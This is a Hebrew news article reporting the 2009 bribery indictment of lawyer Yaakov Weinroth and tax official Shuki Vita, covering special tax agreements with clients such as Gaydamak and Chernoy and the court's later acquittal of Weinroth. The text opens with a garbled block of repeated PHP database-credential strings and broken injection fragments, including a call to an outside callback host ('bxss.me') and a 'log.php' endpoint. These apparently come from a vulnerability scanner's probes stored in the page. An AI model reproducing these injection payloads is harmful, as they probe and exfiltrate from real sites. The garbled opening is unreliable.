$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> הוגש כתב אישום נגד עו"ד וינרוט ושוקי ויטה במתן וקבלת שוחד
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

יעקב ויינרוט הואשם וזוכה מעבירות של מתן שוחד לשוקי ויטה

תאריך: 04/08/2010 17:30   מחבר: מערכת האתר

בחודש דצמבר 2009 הוגש לבית המשפט המחוזי בתל אביב כתב אישום כנגד עורך דין יעקב וינרוט ושוקי ויטה. מעיון בכתב האישום עולים הפרטים הבאים:

שוקי ויטה כיהן בתפקיד פקיד שומה גוש דן בשנים 1997-2004. מחודש ספטמבר 2004 התמנה לסמנכ"ל ביקורת ושומה ברשות המסים. כפקיד שומה היה ממונה מר ויטה על עריכת שומות ואישור חלק מהן, ביצוע אומדני גביית מס והפעלת מנגנון הגבייה בתחום גוש דן. עו"ד יעקב וינרוט בעל מוניטין ומעמד בקרב קהילת עורכי הדין ועובדי ציבור. מתמחה בייצוג עברייני "צווארון לבן". בין השאר ייצג אל מול רשויות המס את מיכאל צ'רנוי וארקאדי גאידמק. תיקי המס של חברת "יעקב וינרוט חברת עורכי דין", מתנהלים בפקיד שומה 3.

בקשה למחיקת הרשעה

ביום 17/07/1997 הוגש נגד ויטה כתב אישום בגין תקיפה והעלבת עובד ציבור. ויטה פנה לוינרוט כדי שזה ייצגו בהליכים המתנהלים נגדו. וינרוט סירב לקבל על עצמו את הייצוג ועורך דין אחר ייצג את ויטה. בשלהי שנת 1988 הורשע ויטה והרשעותיו הפכו לחלוטות לאחר שערעורו נדחה. בשנים 1999-2000 נפתחו תיקי מס ליעקב וינרוט ולאחיו אברהם , באופן אישי וגם באמצעות חברות שבבעלותם. התיקים נפתחו בפקיד שומה 2 בראשות ויטה.

לאחר שנפתחו התיקים כאמור, פנה ויטה לוינרוט כדי שייצג אותו בפנייה לנשיא המדינה למחיקת הרשעתו הפלילית. הפעם ובניגוד לסירובו הקודם הסכים וינרוט לייצג את ויטה והפנה אותו לאחיו אברהם שעובד כעורך דין שכיר במשרדו.  ביום 29/8/2000 שוגרה בקשה לנשיא המדינה למחיקת הרשעתו של ויטה. הבקשה נכתבה על נייר פירמה של משרד וינרוט. כעבור כשנה, שלחה היועצת המשפטית לבית הנשיא מכתב למשרדו של וינרוט והודיעה שהבקשה למחיקה סורבה על ידי הנשיא.

וינרוט לא גבה שכר טרחה מויטה עבור שירות זה וגם לא נקבע סכום כלשהו לתשלום. לפי הנטען בכתב האישום עצם מתן שירות ללא גביית שכר טרחה הינה טובת הנאה הקשורה בתפקידו של ויטה כפקיד שומה ועלולה להטותו למשוא פנים לטובת וינרוט ולקוחותיו שלהם תיקי נישום בפקיד שומה 2.  מכאן, האישום למתן שוחד על ידי וינרוט וקבלת שוחד על ידי ויטה.

פרשת גרטלר צ'רנוי ואח' – שירות משפטי

מספר חודשים לאחר שסורבה הבקשה למחיקת הרשעתו של ויטה על ידי נשיא המדינה, החל וינרוט לייצג לקוחות שונים בפני ויטה לצורך השגת הסכמי מס מיוחדים כאשר במקביל הוא ממשיך לייצג את ויטה ולהעניק לו שירותים משפטיים. דוגמאות להסכמי מס ללקוחות של וינרוט:

ויטה כרת הסכם מס עבור ברנט, חבות המס הוקטנה ללא בדיקה.

בינואר 2003 חתם ויטה על הסכם מס עם דן גרטלר  ההסכם מכיר בבעלות גרטלר על הון זר בסך 30 מיליון דולר, מבלי שנבדק ותוך כדי סטייה מהשורה והפרת נהלים.

ויטה כרת הסכם מס מיוחד עם צ'רנוי לפיו רשות המסים מכירה בבעלותו על הון בסכום של 2 מיליארד דולר, ללא בדיקה וללא ידיעה אם סכום זה קיים, מה הרכבו ומקורו. בגין כריתת ההסכם עם גרטלר קיבל וינרוט שכר טרחה בך 1,688,226 שקלים. מצ'רנוי קיבל וינרוט 14,489,694 שקלים. התשלומים הופקדו לחשבונה של חברת "ספיר הולדינג לימיטד", חברה זרה בבעלות מלאה של וינרוט.

תוך כדי כריתת ההסכמים בין לקוחותיו של וינרוט לבין ויטה, המשיך וינרוט לטפל בענייניו המשפטיים. כך לדוגמה, שלח וינרוט בינואר 2003 מכתב ארוך ומנומק ליועץ המשפטי דאז, אליקים רובינשטיין בעניין מינוי של ויטה לתפקיד סגן נציב מס הכנסה. רובינשטיין מסר בתגובה כי לדון בבקשה הואיל והמינוי המדובר אינו רלבנטי לויטה. עבור השירות המשפטי לא גבה שוב וינרוט שכר טרחה מויטה ובכך הואשם במתן שוחד. במקום שכר טרחה הציע שוב וינרוט לויטה להרים תרומה לגוף כלשהו. הוא לא בדק אם התרומה ניתנה. בפועל, ויטה לא תרם דבר.

שירות משפטי לארקדי גאידמק

סמוך לחודש אפריל 2003 שכר גאידמק את שירותיו של וינרוט לייצגו בעניינים שונים בהם היה מעורב לרבות  החשד כי עבר בצרפת עבירות של סחר לא חוקי בנשק, עבירות מרמה ובעניין צו מעצר בינלאומי שהוצא נגדו וכן בנושאי מס. כחודשיים לאחר מכן, קיבל וינרוט הודעה מפרקליטות המדינה כי היא מתנגדת לקידומו של ויטה לתפקיד סגן נציב מס הכנסה. במקביל להודעה זו המשיך וינרוט לטפל בענייניו של גאידמק בנושא הסכם מס מול ויטה כפקיד שומה.

כדי להסתיר את מעורבותו ביקש וינרוט מפלדמן לפנות לויטה כדי לכרות הסכם מס עם גאידמק. מספר ימים לאחר מכן בחודש יוני 2003 נפתח תיק מס במשרד פקיד שומה גוש דן לחברת קנט שבבעלות האחים וינרוט, שגם היא נישומה באותו פקיד שומה. וינרוט העביר לחשבון חברה זו 5 מיליון שקל שקיבל כשכר טרחה מגאידמק. הכנסה זו חוייבה במס חברות , ששיעורו נמוך יותר משיעור המס המוטל על יחיד, בו חב וינרוט במסגרת תיקיו המתנהלים בפקיד שומה 3.

באותו חודש נפתח בהוראת ויטה תיק מס לגאידמק בפקיד שומה גוש דן לפי טופס שמולא על ידי וינרוט. במקביל לכל אלה, המשיך וינרוט לייצג את ויטה בפני היועץ המשפטי לממשלה בעניין התנגדות הפרקליטות למינויו לסגן נציב מס הכנסה.

בסמוך לכך, הגיש וינרוט לויטה פנייה לתשלום שכר טרחה בסך 2,000 שקלים. ויטה לא שילם ווינרוט לא עמד על תשלום שכר טרחתו. וינרוט העניק לויטה שירותים משפטיים ללא תשלום בתקופה זו. הוא נפגש עם היועץ המשפטי לממשלה ונציבת מס הכנסה וביקש להסיר התנגדות המדינה לקידומו של ויטה ברשות המסים.

בחודש ספטמבר 2003 נכרת הסכם בין גאידמק לויטה. ההסכם הכיר בבעלות גאידמק לפי הצהרתו על סכום של כ – 1 מיליארד דולר. ההסכם נכרת ללא בדיקה אם ההצהרה נכונה ומהו מקור הכסף הנטען בהצהרה.  ההסכם עם גאידמק נתן גושפנקא לטענה כי אין בסיס לחקירה המתנהלת בצרפת נגד גאידמק. בגין הטיפול והסכם המס קיבל וינרוט מגאידמק 15,240,106 שקלים שהופקדו בחשבון חברת ספיר, שבשליטת וינרוט.

התמורה

כעבור 4 ימים מיום החתימה על הסכם המס עם גאידמק הגיש וינרוט בשם ויטה תביעה לבית הדין האזורי לעבודה, נגד נציב מס הכנסה ונציב שירות המדינה וביקש פסק דין הצהרתי לפיו אין מניעה לקדם את ויטה בשירות הציבורי. בחודש נובמבר 2003 סוכם בין וינרוט לויטה כי זה האחרון ישלם עבור הטיפול המשפטי סך של 20,000 שקל, שיפרעו ב 20 תשלומים שווים.

בעקבות הטיפול של וינרוט הושג הסכם פשרה עם המדינה שלא תהיה מניעה למנות את ויטה לכל תקפיד החל מיום 30/11/2004.  ביום 01/9/2004 התמנה ויטה לתפקיד סגן מנהל רשות המיסים לשומה וביקורת. במהלך שנת 2005 פנה וינרוט אל ויטה וביקש התערבותו בהגעה להסדר עם לקוח נוסף שלו בשם, אריה לניאדו.  בעצתו ואישורו של ויטה נחתם הסכם שומה עם לניאדו ביום 25/07/2005.

לפי כתב האישום, בעשותם את המעשים המתוארים לעיל, נתן וינרוט שוחד לויטה בקשר עם תפקידו . השירות המשפטי שניתן לויטה בחינם גרם לו למשוא פנים ולטיפול מועדף וחריג בלקוחות של וינרוט.

הכרעת הדין

ביום 31 לאוקטובר 31 זיכה בית המשפט את עורך דין יעקב ויירוט מכל האישומים כנגדו. שוקי ויטה לעומתו זוכה מלקיחת שוחד אך הורשע במרמה והפרת אמונים.

בהכרעת הדין נפסק בין היתר: שאופן התנהגותו של וינרוט כלפי ויטה לא היה בהכרח חריג או מיטי, בהשוואה להתנהגותו של וינרוט מול לקוחות אחרים של משרדו.

שכר הטרחה שגבה וינרוט מויטה לא היה חריג או מופחת, הן לגופו והם בכך שדמה לשכר הטרחה שגבה וינרוט מלקוחות ברי השוואה.

לא ניתן לשלול את גרסת ההגנה לפיה אין בהסכמי המס שכרת ויטה עם צ'רנוי וגאידמק הטבות, לרבות הטבות מס.

היסוד הנפשי לא הוכח מעבר לכל ספק סביר